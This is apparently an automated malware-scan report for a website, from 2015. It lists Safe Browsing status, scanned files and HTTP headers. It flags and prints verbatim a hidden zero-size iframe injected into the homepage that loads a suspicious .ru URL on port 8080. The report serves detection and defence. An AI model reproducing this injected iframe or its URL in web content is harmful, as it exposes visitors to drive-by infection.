Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bwcahinsaegreetings.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bwcahinsaegreetings.org/ | 200 OK Content-Length: 4377 Content-Type: text/html | malicious |
Page code contains blacklisted domain: ahephogroo.ikebanaclitor.ru ...[5177 bytes skipped]... n="center" class="titlefooter"> </td> </tr> </table> </div> </div> <script type="text/javascript"> <!-- swfobject.registerObject("FlashID4"); swfobject.registerObject("FlashID3"); swfobject.registerObject("FlashID"); //--> </script> </form> <iframe src="http://ahephogroo.ikebanaclitor.ru:8080/actxyqwg5s" width="0" height="0" frameborder="0"></iframe></body> </html> Malicious iFrame found. size: 0x0 src: http://ahephogroo.ikebanaclitor.ru:8080/actxyqwg5s This URL is marked by Google as suspicious <iframe src="http://ahephogroo.ikebanaclitor.ru:8080/actxyqwg5s" width="0" height="0" frameborder="0"> | ||
http://bwcahinsaegreetings.org/jse_form.js | 404 Not Found Content-Length: 5229 Content-Type: text/html | clean |
http://bwcahinsaegreetings.org/test404page.js | 404 Not Found Content-Length: 5235 Content-Type: text/html | clean |
http://bwcahinsaegreetings.org/Scripts/swfobject_modified.js | 404 Not Found Content-Length: 5265 Content-Type: text/html | clean |
http://bwcahinsaegreetings.org/AC_RunActiveContent.js | 404 Not Found Content-Length: 5251 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bwcahinsaegreetings.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 Jan 2015 01:16:18 GMT
Server: Microsoft-IIS/7.5
Content-Length: 4377
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=xtych555je4xzfmam53ec4u1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...4377 bytes of data.
GET / HTTP/1.1
Host: bwcahinsaegreetings.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 Jan 2015 01:16:18 GMT
Server: Microsoft-IIS/7.5
Content-Length: 4377
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=xtych555je4xzfmam53ec4u1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...4377 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bwcahinsaegreetings.org
Referer: http://www.google.com/search?q=bwcahinsaegreetings.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bwcahinsaegreetings.org
Referer: http://www.google.com/search?q=bwcahinsaegreetings.org
Result:
The result is similar to the first query. There are no suspicious redirects found.